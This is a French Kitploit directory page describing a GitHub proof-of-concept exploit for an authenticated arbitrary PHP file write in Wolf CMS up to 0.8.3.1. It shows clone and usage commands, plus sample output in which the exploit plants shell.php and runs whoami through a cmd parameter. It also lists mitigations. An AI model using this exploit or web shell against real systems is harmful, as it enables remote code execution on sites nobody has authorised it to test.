Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-67206 — Exploit PoC pour Wolf CMS <= 0.8.3.1 : s'authentifie auprès de l'Admin, écrit un fichier PHP arbitraire dans /public via FileManagerController et exécute des commandes via un web shell. | Kitploit
Outils/GitHubGitHub/anirbala98/cve-2026-67206
ExploitationExploitation d'Applications WebPost-ExploitationTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubanirbala98/cve-2026-67206

CVE-2026-67206

Exploit PoC pour Wolf CMS <= 0.8.3.1 : s'authentifie auprès de l'Admin, écrit un fichier PHP arbitraire dans /public via FileManagerController et exécute des commandes via un web shell.

Voir le dépôt
1il y a 18 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-67206 - Wolf CMS <= 0.8.3.1 - RCE via écriture de fichier arbitraire

Ce dépôt contient un exploit de preuve de concept (PoC) pour CVE-2026-67206

Avertissement

Ce projet est fourni à des fins éducatives et uniquement pour des tests de sécurité autorisés. Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas la permission de tester.

Vue d'ensemble

Une vulnérabilité d'écriture de fichier arbitraire existe dans les versions de Wolf CMS jusqu'à la 0.8.3.1. Elle permet à un attaquant authentifié d'écrire des fichiers arbitraires malveillants dans le répertoire /public de la racine web via les fonctions create_file() et save() de FileManagerController.php. La fonction create_file() de FileManagerController.php ne valide pas les extensions de fichier, ce qui permet à des attaquants authentifiés d'écrire des scripts PHP malveillants et d'obtenir des privilèges d'exécution de code à distance.

Version concernée

Toutes les versions de Wolf CMS jusqu'à la 0.8.3.1 sont concernées. Le dépôt Wolf CMS a été archivé le 28 août 2021 et n'est plus activement maintenu. Il n'existe actuellement aucun correctif pour cette vulnérabilité.

Prérequis

  • Python 3.13.14
  • Requests 2.32.5
  • Beautifulsoup4 4.15.0

Installation

root@kitploit:~
git clone https://github.com/anirbala98/CVE-2026-67206.git
cd CVE-2026-67206/
pip install -r requirements.txt

Utilisation

root@kitploit:~
python exploit.py <base_url> -u <username> -p <password>
python exploit.py http://127.0.0.1:8080/ -u admin -p admin

Exemple

root@kitploit:~
└─$ python exploit.py http://127.0.0.1:8080/ -u admin -p 12966cc814K 
[*] Logging in with provided credentials...
[+] Login successful

[*] Creating a file named shell.php...
[+] File creation successful

[*] Attempting to write payload to shell.php...
[+] Payload written successfully!
[+] Web shell can be accessed with 'cmd' query string at http://127.0.0.1:8080/public/shell.php
[+] Testing output of http://127.0.0.1:8080/public/shell.php?cmd=whoami
www-data

Atténuation

  • Validez les extensions des fichiers créés par les utilisateurs authentifiés sur la base d'une liste blanche
  • Interdisez les extensions telles que .php, .phtml, .phar, .php5, etc., sauf si nécessaire
  • Interdisez l'exécution de PHP dans les répertoires de téléversement de la racine du serveur web
  • Enregistrez les fichiers créés sur un serveur différent si possible afin de minimiser l'impact

Références

  • https://www.tenable.com/cve/CVE-2026-67206
  • https://github.com/Caycon/cve-advisories/blob/main/2026/WolfCms/CVE-2026-67206.md
Télécharger l’outil